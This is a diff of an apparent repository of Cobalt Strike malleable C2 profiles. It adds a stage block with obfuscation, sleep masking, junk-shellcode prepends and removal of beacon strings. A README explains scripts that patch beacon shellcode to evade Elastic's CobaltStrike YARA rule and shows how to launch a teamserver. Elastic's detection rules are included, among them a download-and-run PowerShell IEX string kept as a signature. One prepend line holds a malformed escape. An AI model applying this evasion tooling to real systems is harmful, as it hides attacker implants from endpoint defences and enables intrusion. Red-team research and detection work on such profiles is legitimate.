     246 + prepend "/*! jQuery UI - v1.12.1 - 2016-09-14 * http://jqueryui.com * Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js , effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect -fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effe cts/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-s ize.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mix in.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio. js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable .js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, w idgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, w idgets/sortable.js, widgets/spinner.js, widgets/tabs.js, widgets/tooltip.js * Copyright jQuery Foundation and other contributors; Licensed MIT */";
     247 + append "/*! jQuery UI - v1.12.1 - 2016-09-14 * http://jqueryui.com * Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js , effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect -fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effe cts/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-s ize.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mix in.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio. js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable .js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, w idgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, w idgets/sortable.js, widgets/spinner.js, widgets/tabs.js, widgets/tooltip.js * Copyright jQuery Foundation and other contributors; Licensed MIT */";
     248 + print;
     249 + 
     250 + }
     251 + }
     252 +}
     253 + 
     254 +stage {
     255 + set checksum "0";
     256 + set compile_time "5 May 2023 10:52:15";
     257 + set entry_point "170000";
     258 + #set image_size_x86 "6586368";
     259 + #set image_size_x64 "6586368";
     260 + set name "srv.dll";
     261 + set magic_mz_x64 "OOPS";
     262 + set magic_mz_x86 "OOPS";
     263 + set userwx "false";
     264 + set cleanup "true";
     265 + set sleep_mask "true";
     266 + set stomppe "true";
     267 + set obfuscate "true";
     268 + set rich_header "\x92\x75\xde\x7f\xf0\x62\x4c\xf0\xc3\x44\x74\x97\x05\xa2\x3d\xd2\x18\xab\x08\xaa\xe9\xcf\x98\x81\x31\x90\x22";
     269 +
     270 + set sleep_mask "true";
     271 +
     272 + set smartinject "true";
     273 +
     274 + #set allocator "HeapAlloc";
     275 + set magic_pe "EA";
     276 + 
     277 + set module_x86 "wwanmm.dll";
     278 + set module_x64 "wwanmm.dll";
     279 + 
     280 + transform-x86 {
     281 + prepend "\x48\x0f\x1f\x00\x66\x90\x43\x66\x87\xdb\x66\x87\xd2\x40\x45\x49\x41\x87\xd2\x\x47\x87\xdb\x4c\x0f\x1f\x00\x0f\x1f\x00\x66\x87\xc9\x0f\x1f\x04\x00\x42\x66\x0f\x1f\x04\x00\x90\x87\xc9\x44\x46\x40";
     282 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     283 + strrep "ReflectiveLoader" "";
     284 + strrep "beacon.dll" "";
     285 + strrep "beacon.dll" ""; # Remove this text
     286 + strrep "msvcrt.dll" "";
     287 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     288 + }
     289 + 
     290 + transform-x64 {
     291 + prepend "\x48\x0f\x1f\x00\x66\x90\x43\x66\x87\xdb\x66\x87\xd2\x40\x45\x49\x41\x87\xd2\x\x47\x87\xdb\x4c\x0f\x1f\x00\x0f\x1f\x00\x66\x87\xc9\x0f\x1f\x04\x00\x42\x66\x0f\x1f\x04\x00\x90\x87\xc9\x44\x46\x40";
     292 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     293 + strrep "ReflectiveLoader" "";
     294 + strrep "beacon.x64.dll" "";
     295 + strrep "beacon.dll" ""; # Remove this text
     296 + strrep "msvcrt.dll" "";
     297 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     298 + strrep "Stack around the variable" "";
     299 + strrep "was corrupted." "";
     300 + strrep "The variable" "";
     301 + strrep "is being used without being initialized." "";
     302 + strrep "The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared" "";
     303 + strrep "A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:" "";
     304 + strrep "Changing the code in this way will not affect the quality of the resulting optimized code." "";
     305 + strrep "Stack memory was corrupted" "";
     306 + strrep "A local variable was used before it was initialized" "";
     307 + strrep "Stack memory around _alloca was corrupted" "";
     308 + strrep "Unknown Runtime Check Error" "";
     309 + strrep "Unknown Filename" "";
     310 + strrep "Unknown Module Name" "";
     311 + strrep "Run-Time Check Failure" "";
     312 + strrep "Stack corrupted near unknown variable" "";
     313 + strrep "Stack pointer corruption" "";
     314 + strrep "Cast to smaller type causing loss of data" "";
     315 + strrep "Stack memory corruption" "";
     316 + strrep "Local variable used before initialization" "";
     317 + strrep "Stack around" "corrupted";
     318 + strrep "operator" "";
     319 + strrep "operator co_await" "";
     320 + strrep "operator<=>" "";
     321 +}
     322 + 
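--- a/README.md
+++ b/README.md
@@ -1,3 +1,58 @@
 # Malleable-CS-Profiles
-A list of python tools to help create an OPSEC-safe Cobalt Strike profile.
+A list of python tools to help create an OPSEC-safe Cobalt Strike profile. This is the Github repository of the relevant blog post: [Unleashing the Unseen: Harnessing the Power of Cobalt Strike Profiles for EDR Evasion](https://whiteknightlabs.com/2023/05/19/unleashing-the-unseen-harnessing-the-power-of-cobalt-strike-profiles-for-edr-evasion/)
+
+## Usage
+
+### prepend.py
+Is a python script which generates dynamic junk shellcode which will be appended on the beginning of the actual shellcode. To use the script, execute:
+```bash
+python3 prepend.py
+```
+
+Copy the output and paste it in the profile (inside transform-x64 or transform-x86 block). The profile will look like the following:
+```
+transform-x64 {
+ ...
+ prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
+ ...
+}
+```
+
+### rich_header.py
+Is a python script which generates dynamic shellcode that is responsible for the meta-information inserted by the compiler. The Rich header is a PE section that serves as a fingerprint of a Windows' executable’s build environment. To use the script, execute:
+```bash
+python3 rich_header.py
+```
+
+Copy the output and paste it in the profile (inside transform-x64 or transform-x86 block). The profile will look like the following:
+```
+stage {
+ ...
+ set rich_header "\x2e\x9a\xad\xf1...";
+ ...
+}
+```
+
+### rule_f0b627fc_bypass.py
+Is a python script which modifies the shellcode in order bypass rule `Windows_Trojan_CobaltStrike_f0b627fc` from Elastic. To use the script, execute:
+```bash
+python3 rule_f0b627fc_bypass.py beacon_x64.bin
+```
+
+Then use the generated beacon as your new shellcode.
+
+## Profiles
+
+To use profiles in Cobalt Strike, execute the following command:
+```bash
+bash teamserver <your_ip> <your_password> <path/to/your.profile>
+```
+
+## References
+https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures
+https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar
+https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/amazon_event
+
+## Author
+Kleiton Kurti ([@kleiton0x00](https://github.com/kleiton0x00))
 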
    Windows_Trojan_CobaltStrike.yar
     1 +rule Windows_Trojan_CobaltStrike_c851687a {
     2 + meta:
     3 + author = "Elastic Security"
     4 + id = "c851687a-aac6-43e7-a0b6-6aed36dcf12e"
     5 + fingerprint = "70224e28a223d09f2211048936beb9e2d31c0312c97a80e22c85e445f1937c10"
     6 + creation_date = "2021-03-23"
     7 + last_modified = "2021-08-23"
     8 + description = "Identifies UAC Bypass module from Cobalt Strike"
     9 + threat_name = "Windows.Trojan.CobaltStrike"
     10 + severity = 100
     11 + arch_context = "x86"
     12 + scan_context = "file, memory"
     13 + license = "Elastic License v2"
     14 + os = "windows"
     15 + strings:
     16 + $a1 = "bypassuac.dll" ascii fullword
     17 + $a2 = "bypassuac.x64.dll" ascii fullword
     18 + $a3 = "\\\\.\\pipe\\bypassuac" ascii fullword
     19 + $b1 = "\\System32\\sysprep\\sysprep.exe" wide fullword
     20 + $b2 = "[-] Could not write temp DLL to '%S'" ascii fullword
     21 + $b3 = "[*] Cleanup successful" ascii fullword
     22 + $b4 = "\\System32\\cliconfg.exe" wide fullword
     23 + $b5 = "\\System32\\eventvwr.exe" wide fullword
     24 + $b6 = "[-] %S ran too long. Could not terminate the process." ascii fullword
     25 + $b7 = "[*] Wrote hijack DLL to '%S'" ascii fullword
     26 + $b8 = "\\System32\\sysprep\\" wide fullword
     27 + $b9 = "[-] COM initialization failed." ascii fullword
     28 + $b10 = "[-] Privileged file copy failed: %S" ascii fullword
     29 + $b11 = "[-] Failed to start %S: %d" ascii fullword
     30 + $b12 = "ReflectiveLoader"
     31 + $b13 = "[-] '%S' exists in DLL hijack location." ascii fullword
     32 + $b14 = "[-] Cleanup failed. Remove: %S" ascii fullword
     33 + $b15 = "[+] %S ran and exited." ascii fullword
     34 + $b16 = "[+] Privileged file copy success! %S" ascii fullword
     35 + condition:
     36 + 2 of ($a*) or 10 of ($b*)
     37 +}
     38 + 
     39 +rule Windows_Trojan_CobaltStrike_0b58325e {
     40 + meta:
     41 + author = "Elastic Security"
     42 + id = "0b58325e-2538-434d-9a2c-26e2c32db039"
     43 + fingerprint = "8ecd5bdce925ae5d4f90cecb9bc8c3901b54ba1c899a33354bcf529eeb2485d4"
     44 + creation_date = "2021-03-23"
     45 + last_modified = "2021-08-23"
     46 + description = "Identifies Keylogger module from Cobalt Strike"
     47 + threat_name = "Windows.Trojan.CobaltStrike"
     48 + severity = 100
     49 + arch_context = "x86"
     50 + scan_context = "file, memory"
     51 + license = "Elastic License v2"
     52 + os = "windows"
     53 + strings:
     54 + $a1 = "keylogger.dll" ascii fullword
     55 + $a2 = "keylogger.x64.dll" ascii fullword
     56 + $a3 = "\\\\.\\pipe\\keylogger" ascii fullword
     57 + $a4 = "%cE=======%c" ascii fullword
     58 + $a5 = "[unknown: %02X]" ascii fullword
     59 + $b1 = "ReflectiveLoader"
     60 + $b2 = "%c2%s%c" ascii fullword
     61 + $b3 = "[numlock]" ascii fullword
     62 + $b4 = "%cC%s" ascii fullword
     63 + $b5 = "[backspace]" ascii fullword
     64 + $b6 = "[scroll lock]" ascii fullword
     65 + $b7 = "[control]" ascii fullword
     66 + $b8 = "[left]" ascii fullword
     67 + $b9 = "[page up]" ascii fullword
     68 + $b10 = "[page down]" ascii fullword
     69 + $b11 = "[prtscr]" ascii fullword
     70 + $b12 = "ZRich9" ascii fullword
     71 + $b13 = "[ctrl]" ascii fullword
     72 + $b14 = "[home]" ascii fullword
     73 + $b15 = "[pause]" ascii fullword
     74 + $b16 = "[clear]" ascii fullword
     75 + condition:
     76 + 1 of ($a*) and 14 of ($b*)
     77 +}
     78 + 
     79 +rule Windows_Trojan_CobaltStrike_2b8cddf8 {
     80 + meta:
     81 + author = "Elastic Security"
     82 + id = "2b8cddf8-ca7a-4f85-be9d-6d8534d0482e"
     83 + fingerprint = "0d7d28d79004ca61b0cfdcda29bd95e3333e6fc6e6646a3f6ba058aa01bee188"
     84 + creation_date = "2021-03-23"
     85 + last_modified = "2021-08-23"
     86 + description = "Identifies dll load module from Cobalt Strike"
     87 + threat_name = "Windows.Trojan.CobaltStrike"
     88 + severity = 100
     89 + arch_context = "x86"
     90 + scan_context = "file, memory"
     91 + license = "Elastic License v2"
     92 + os = "windows"
     93 + strings:
     94 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\dllload.x64.o" ascii fullword
     95 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\dllload.x86.o" ascii fullword
     96 + $b1 = "__imp_BeaconErrorDD" ascii fullword
     97 + $b2 = "__imp_BeaconErrorNA" ascii fullword
     98 + $b3 = "__imp_BeaconErrorD" ascii fullword
     99 + $b4 = "__imp_BeaconDataInt" ascii fullword
     100 + $b5 = "__imp_KERNEL32$WriteProcessMemory" ascii fullword
     101 + $b6 = "__imp_KERNEL32$OpenProcess" ascii fullword
     102 + $b7 = "__imp_KERNEL32$CreateRemoteThread" ascii fullword
     103 + $b8 = "__imp_KERNEL32$VirtualAllocEx" ascii fullword
     104 + $c1 = "__imp__BeaconErrorDD" ascii fullword
     105 + $c2 = "__imp__BeaconErrorNA" ascii fullword
     106 + $c3 = "__imp__BeaconErrorD" ascii fullword
     107 + $c4 = "__imp__BeaconDataInt" ascii fullword
     108 + $c5 = "__imp__KERNEL32$WriteProcessMemory" ascii fullword
     109 + $c6 = "__imp__KERNEL32$OpenProcess" ascii fullword
     110 + $c7 = "__imp__KERNEL32$CreateRemoteThread" ascii fullword
     111 + $c8 = "__imp__KERNEL32$VirtualAllocEx" ascii fullword
     112 + condition:
     113 + 1 of ($a*) or 5 of ($b*) or 5 of ($c*)
     114 +}
     115 + 
     116 +rule Windows_Trojan_CobaltStrike_59b44767 {
     117 + meta:
     118 + author = "Elastic Security"
     119 + id = "59b44767-c9a5-42c0-b177-7fe49afd7dfb"
     120 + fingerprint = "882886a282ec78623a0d3096be3d324a8a1b8a23bcb88ea0548df2fae5e27aa5"
     121 + creation_date = "2021-03-23"
     122 + last_modified = "2021-08-23"
     123 + description = "Identifies getsystem module from Cobalt Strike"
     124 + threat_name = "Windows.Trojan.CobaltStrike"
     125 + severity = 100
     126 + arch_context = "x86"
     127 + scan_context = "file, memory"
     128 + license = "Elastic License v2"
     129 + os = "windows"
     130 + strings:
     131 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\getsystem.x86.o" ascii fullword
     132 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\getsystem.x64.o" ascii fullword
     133 + $b1 = "getsystem failed." ascii fullword
     134 + $b2 = "_isSystemSID" ascii fullword
     135 + $b3 = "__imp__NTDLL$NtQuerySystemInformation@16" ascii fullword
     136 + $c1 = "getsystem failed." ascii fullword
     137 + $c2 = "$pdata$isSystemSID" ascii fullword
     138 + $c3 = "$unwind$isSystemSID" ascii fullword
     139 + $c4 = "__imp_NTDLL$NtQuerySystemInformation" ascii fullword
     140 + condition:
     141 + 1 of ($a*) or 3 of ($b*) or 3 of ($c*)
     142 +}
     143 + 
     144 +rule Windows_Trojan_CobaltStrike_7efd3c3f {
     145 + meta:
     146 + author = "Elastic Security"
     147 + id = "7efd3c3f-1104-4b46-9d1e-dc2c62381b8c"
     148 + fingerprint = "9e7c7c9a7436f5ee4c27fd46d6f06e7c88f4e4d1166759573cedc3ed666e1838"
     149 + creation_date = "2021-03-23"
     150 + last_modified = "2021-08-23"
     151 + description = "Identifies Hashdump module from Cobalt Strike"
     152 + threat_name = "Windows.Trojan.CobaltStrike"
     153 + severity = 70
     154 + arch_context = "x86"
     155 + scan_context = "file, memory"
     156 + license = "Elastic License v2"
     157 + os = "windows"
     158 + strings:
     159 + $a1 = "hashdump.dll" ascii fullword
     160 + $a2 = "hashdump.x64.dll" ascii fullword
     161 + $a3 = "\\\\.\\pipe\\hashdump" ascii fullword
     162 + $a4 = "ReflectiveLoader"
     163 + $a5 = "Global\\SAM" ascii fullword
     164 + $a6 = "Global\\FREE" ascii fullword
     165 + $a7 = "[-] no results." ascii fullword
     166 + condition:
     167 + 4 of ($a*)
     168 +}
     169 + 
     170 +rule Windows_Trojan_CobaltStrike_6e971281 {
     171 + meta:
     172 + author = "Elastic Security"
     173 + id = "6e971281-3ee3-402f-8a72-745ec8fb91fb"
     174 + fingerprint = "62d97cf73618a1b4d773d5494b2761714be53d5cda774f9a96eaa512c8d5da12"
     175 + creation_date = "2021-03-23"
     176 + last_modified = "2021-08-23"
     177 + description = "Identifies Interfaces module from Cobalt Strike"
     178 + threat_name = "Windows.Trojan.CobaltStrike"
     179 + severity = 100
     180 + arch_context = "x86"
     181 + scan_context = "file, memory"
     182 + license = "Elastic License v2"
     183 + os = "windows"
     184 + strings:
     185 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\interfaces.x64.o" ascii fullword
     186 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\interfaces.x86.o" ascii fullword
     187 + $b1 = "__imp_BeaconFormatAlloc" ascii fullword
     188 + $b2 = "__imp_BeaconFormatPrintf" ascii fullword
     189 + $b3 = "__imp_BeaconOutput" ascii fullword
     190 + $b4 = "__imp_KERNEL32$LocalAlloc" ascii fullword
     191 + $b5 = "__imp_KERNEL32$LocalFree" ascii fullword
     192 + $b6 = "__imp_LoadLibraryA" ascii fullword
     193 + $c1 = "__imp__BeaconFormatAlloc" ascii fullword
     194 + $c2 = "__imp__BeaconFormatPrintf" ascii fullword
     195 + $c3 = "__imp__BeaconOutput" ascii fullword
     196 + $c4 = "__imp__KERNEL32$LocalAlloc" ascii fullword
     197 + $c5 = "__imp__KERNEL32$LocalFree" ascii fullword
     198 + $c6 = "__imp__LoadLibraryA" ascii fullword
     199 + condition:
     200 + 1 of ($a*) or 4 of ($b*) or 4 of ($c*)
     201 +}
     202 + 
     203 +rule Windows_Trojan_CobaltStrike_09b79efa {
     204 + meta:
     205 + author = "Elastic Security"
     206 + id = "09b79efa-55d7-481d-9ee0-74ac5f787cef"
     207 + fingerprint = "04ef6555e8668c56c528dc62184331a6562f47652c73de732e5f7c82779f2fd8"
     208 + creation_date = "2021-03-23"
     209 + last_modified = "2021-08-23"
     210 + description = "Identifies Invoke Assembly module from Cobalt Strike"
     211 + threat_name = "Windows.Trojan.CobaltStrike"
     212 + severity = 100
     213 + arch_context = "x86"
     214 + scan_context = "file, memory"
     215 + license = "Elastic License v2"
     216 + os = "windows"
     217 + strings:
     218 + $a1 = "invokeassembly.x64.dll" ascii fullword
     219 + $a2 = "invokeassembly.dll" ascii fullword
     220 + $b1 = "[-] Failed to get default AppDomain w/hr 0x%08lx" ascii fullword
     221 + $b2 = "[-] Failed to load the assembly w/hr 0x%08lx" ascii fullword
     222 + $b3 = "[-] Failed to create the runtime host" ascii fullword
     223 + $b4 = "[-] Invoke_3 on EntryPoint failed." ascii fullword
     224 + $b5 = "[-] CLR failed to start w/hr 0x%08lx" ascii fullword
     225 + $b6 = "ReflectiveLoader"
     226 + $b7 = ".NET runtime [ver %S] cannot be loaded" ascii fullword
     227 + $b8 = "[-] No .NET runtime found. :(" ascii fullword
     228 + $b9 = "[-] ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx" ascii fullword
     229 + $c1 = { FF 57 0C 85 C0 78 40 8B 45 F8 8D 55 F4 8B 08 52 50 }
     230 + condition:
     231 + 1 of ($a*) or 3 of ($b*) or 1 of ($c*)
     232 +}
     233 + 
     234 +rule Windows_Trojan_CobaltStrike_6e77233e {
     235 + meta:
     236 + author = "Elastic Security"
     237 + id = "6e77233e-7fb4-4295-823d-f97786c5d9c4"
     238 + fingerprint = "cef2949eae78b1c321c2ec4010749a5ac0551d680bd5eb85493fc88c5227d285"
     239 + creation_date = "2021-03-23"
     240 + last_modified = "2021-08-23"
     241 + description = "Identifies Kerberos module from Cobalt Strike"
     242 + threat_name = "Windows.Trojan.CobaltStrike"
     243 + severity = 100
     244 + arch_context = "x86"
     245 + scan_context = "file, memory"
     246 + license = "Elastic License v2"
     247 + os = "windows"
     248 + strings:
     249 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\kerberos.x64.o" ascii fullword
     250 + $a2 = "$unwind$command_kerberos_ticket_use" ascii fullword
     251 + $a3 = "$pdata$command_kerberos_ticket_use" ascii fullword
     252 + $a4 = "command_kerberos_ticket_use" ascii fullword
     253 + $a5 = "$pdata$command_kerberos_ticket_purge" ascii fullword
     254 + $a6 = "command_kerberos_ticket_purge" ascii fullword
     255 + $a7 = "$unwind$command_kerberos_ticket_purge" ascii fullword
     256 + $a8 = "$unwind$kerberos_init" ascii fullword
     257 + $a9 = "$unwind$KerberosTicketUse" ascii fullword
     258 + $a10 = "KerberosTicketUse" ascii fullword
     259 + $a11 = "$unwind$KerberosTicketPurge" ascii fullword
     260 + $b1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\kerberos.x86.o" ascii fullword
     261 + $b2 = "_command_kerberos_ticket_use" ascii fullword
     262 + $b3 = "_command_kerberos_ticket_purge" ascii fullword
     263 + $b4 = "_kerberos_init" ascii fullword
     264 + $b5 = "_KerberosTicketUse" ascii fullword
     265 + $b6 = "_KerberosTicketPurge" ascii fullword
     266 + $b7 = "_LsaCallKerberosPackage" ascii fullword
     267 + condition:
     268 + 5 of ($a*) or 3 of ($b*)
     269 +}
     270 + 
     271 +rule Windows_Trojan_CobaltStrike_de42495a {
     272 + meta:
     273 + author = "Elastic Security"
     274 + id = "de42495a-0002-466e-98b9-19c9ebb9240e"
     275 + fingerprint = "dab3c25809ec3af70df5a8a04a2efd4e8ecb13a4c87001ea699e7a1512973b82"
     276 + creation_date = "2021-03-23"
     277 + last_modified = "2021-08-23"
     278 + description = "Identifies Mimikatz module from Cobalt Strike"
     279 + threat_name = "Windows.Trojan.CobaltStrike"
     280 + severity = 100
     281 + arch_context = "x86"
     282 + scan_context = "file, memory"
     283 + license = "Elastic License v2"
     284 + os = "windows"
     285 + strings:
     286 + $a1 = "\\\\.\\pipe\\mimikatz" ascii fullword
     287 + $b1 = "ERROR kuhl_m_dpapi_chrome ; Input 'Login Data' file needed (/in:\"%%localappdata%%\\Google\\Chrome\\User Data\\Default\\Login Da" wide
     288 + $b2 = "ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" wide fullword
     289 + $b3 = "ERROR kuhl_m_lsadump_getUsersAndSamKey ; kuhl_m_lsadump_getSamKey KO" wide fullword
     290 + $b4 = "ERROR kuhl_m_lsadump_getComputerAndSyskey ; kull_m_registry_RegOpenKeyEx LSA KO" wide fullword
     291 + $b5 = "ERROR kuhl_m_lsadump_lsa_getHandle ; OpenProcess (0x%08x)" wide fullword
     292 + $b6 = "ERROR kuhl_m_lsadump_enumdomains_users ; SamLookupNamesInDomain: %08x" wide fullword
     293 + $b7 = "mimikatz(powershell) # %s" wide fullword
     294 + $b8 = "powershell_reflective_mimikatz" ascii fullword
     295 + $b9 = "mimikatz_dpapi_cache.ndr" wide fullword
     296 + $b10 = "mimikatz.log" wide fullword
     297 + $b11 = "ERROR mimikatz_doLocal" wide
     298 + $b12 = "mimikatz_x64.compressed" wide
     299 + condition:
     300 + 1 of ($a*) and 7 of ($b*)
     301 +}
     302 + 
     303 +rule Windows_Trojan_CobaltStrike_72f68375 {
     304 + meta:
     305 + author = "Elastic Security"
     306 + id = "72f68375-35ab-49cc-905d-15302389a236"
     307 + fingerprint = "ecc28f414b2c347722b681589da8529c6f3af0491845453874f8fd87c2ae86d7"
     308 + creation_date = "2021-03-23"
     309 + last_modified = "2021-08-23"
     310 + description = "Identifies Netdomain module from Cobalt Strike"
     311 + threat_name = "Windows.Trojan.CobaltStrike"
     312 + severity = 100
     313 + arch_context = "x86"
     314 + scan_context = "file, memory"
     315 + license = "Elastic License v2"
     316 + os = "windows"
     317 + strings:
     318 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\net_domain.x64.o" ascii fullword
     319 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\net_domain.x86.o" ascii fullword
     320 + $b1 = "__imp_BeaconPrintf" ascii fullword
     321 + $b2 = "__imp_NETAPI32$NetApiBufferFree" ascii fullword
     322 + $b3 = "__imp_NETAPI32$DsGetDcNameA" ascii fullword
     323 + $c1 = "__imp__BeaconPrintf" ascii fullword
     324 + $c2 = "__imp__NETAPI32$NetApiBufferFree" ascii fullword
     325 + $c3 = "__imp__NETAPI32$DsGetDcNameA" ascii fullword
     326 + condition:
     327 + 1 of ($a*) or 2 of ($b*) or 2 of ($c*)
     328 +}
     329 + 
     330 +rule Windows_Trojan_CobaltStrike_15f680fb {
     331 + meta:
     332 + author = "Elastic Security"
     333 + id = "15f680fb-a04f-472d-a182-0b9bee111351"
     334 + fingerprint = "0ecb8e41c01bf97d6dea4cf6456b769c6dd2a037b37d754f38580bcf561e1d2c"
     335 + creation_date = "2021-03-23"
     336 + last_modified = "2021-08-23"
     337 + description = "Identifies Netview module from Cobalt Strike"
     338 + threat_name = "Windows.Trojan.CobaltStrike"
     339 + severity = 100
     340 + arch_context = "x86"
     341 + scan_context = "file, memory"
     342 + license = "Elastic License v2"
     343 + os = "windows"
     344 + strings:
     345 + $a1 = "netview.x64.dll" ascii fullword
     346 + $a2 = "netview.dll" ascii fullword
     347 + $a3 = "\\\\.\\pipe\\netview" ascii fullword
     348 + $b1 = "Sessions for \\\\%s:" ascii fullword
     349 + $b2 = "Account information for %s on \\\\%s:" ascii fullword
     350 + $b3 = "Users for \\\\%s:" ascii fullword
     351 + $b4 = "Shares at \\\\%s:" ascii fullword
     352 + $b5 = "ReflectiveLoader" ascii fullword
     353 + $b6 = "Password changeable" ascii fullword
     354 + $b7 = "User's Comment" wide fullword
     355 + $b8 = "List of hosts for domain '%s':" ascii fullword
     356 + $b9 = "Password changeable" ascii fullword
     357 + $b10 = "Logged on users at \\\\%s:" ascii fullword
     358 + condition:
     359 + 2 of ($a*) or 6 of ($b*)
     360 +}
     361 + 
     362 +rule Windows_Trojan_CobaltStrike_5b4383ec {
     363 + meta:
     364 + author = "Elastic Security"
     365 + id = "5b4383ec-3c93-4e91-850e-d43cc3a86710"
     366 + fingerprint = "283d3d2924e92b31f26ec4fc6b79c51bd652fb1377b6985b003f09f8c3dba66c"
     367 + creation_date = "2021-03-23"
     368 + last_modified = "2021-08-23"
     369 + description = "Identifies Portscan module from Cobalt Strike"
     370 + threat_name = "Windows.Trojan.CobaltStrike"
     371 + severity = 100
     372 + arch_context = "x86"
     373 + scan_context = "file, memory"
     374 + license = "Elastic License v2"
     375 + os = "windows"
     376 + strings:
     377 + $a1 = "portscan.x64.dll" ascii fullword
     378 + $a2 = "portscan.dll" ascii fullword
     379 + $a3 = "\\\\.\\pipe\\portscan" ascii fullword
     380 + $b1 = "(ICMP) Target '%s' is alive. [read %d bytes]" ascii fullword
     381 + $b2 = "(ARP) Target '%s' is alive. " ascii fullword
     382 + $b3 = "TARGETS!12345" ascii fullword
     383 + $b4 = "ReflectiveLoader" ascii fullword
     384 + $b5 = "%s:%d (platform: %d version: %d.%d name: %S domain: %S)" ascii fullword
     385 + $b6 = "Scanner module is complete" ascii fullword
     386 + $b7 = "pingpong" ascii fullword
     387 + $b8 = "PORTS!12345" ascii fullword
     388 + $b9 = "%s:%d (%s)" ascii fullword
     389 + $b10 = "PREFERENCES!12345" ascii fullword
     390 + condition:
     391 + 2 of ($a*) or 6 of ($b*)
     392 +}
     393 + 
     394 +rule Windows_Trojan_CobaltStrike_91e08059 {
     395 + meta:
     396 + author = "Elastic Security"
     397 + id = "91e08059-46a8-47d0-91c9-e86874951a4a"
     398 + fingerprint = "d8baacb58a3db00489827275ad6a2d007c018eaecbce469356b068d8a758634b"
     399 + creation_date = "2021-03-23"
     400 + last_modified = "2021-08-23"
     401 + description = "Identifies Post Ex module from Cobalt Strike"
     402 + threat_name = "Windows.Trojan.CobaltStrike"
     403 + severity = 100
     404 + arch_context = "x86"
     405 + scan_context = "file, memory"
     406 + license = "Elastic License v2"
     407 + os = "windows"
     408 + strings:
     409 + $a1 = "postex.x64.dll" ascii fullword
     410 + $a2 = "postex.dll" ascii fullword
     411 + $a3 = "RunAsAdminCMSTP" ascii fullword
     412 + $a4 = "KerberosTicketPurge" ascii fullword
     413 + $b1 = "GetSystem" ascii fullword
     414 + $b2 = "HelloWorld" ascii fullword
     415 + $b3 = "KerberosTicketUse" ascii fullword
     416 + $b4 = "SpawnAsAdmin" ascii fullword
     417 + $b5 = "RunAsAdmin" ascii fullword
     418 + $b6 = "NetDomain" ascii fullword
     419 + condition:
     420 + 2 of ($a*) or 4 of ($b*)
     421 +}
     422 + 
     423 +rule Windows_Trojan_CobaltStrike_ee756db7 {
     424 + meta:
     425 + author = "Elastic Security"
     426 + id = "ee756db7-e177-41f0-af99-c44646d334f7"
     427 + fingerprint = "e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71"
     428 + creation_date = "2021-03-23"
     429 + last_modified = "2021-08-23"
     430 + description = "Attempts to detect Cobalt Strike based on strings found in BEACON"
     431 + threat_name = "Windows.Trojan.CobaltStrike"
     432 + severity = 100
     433 + arch_context = "x86"
     434 + scan_context = "file, memory"
     435 + license = "Elastic License v2"
     436 + os = "windows"
     437 + strings:
     438 + $a1 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     439 + $a2 = "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     440 + $a3 = "ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset." ascii fullword
     441 + $a4 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" ascii fullword
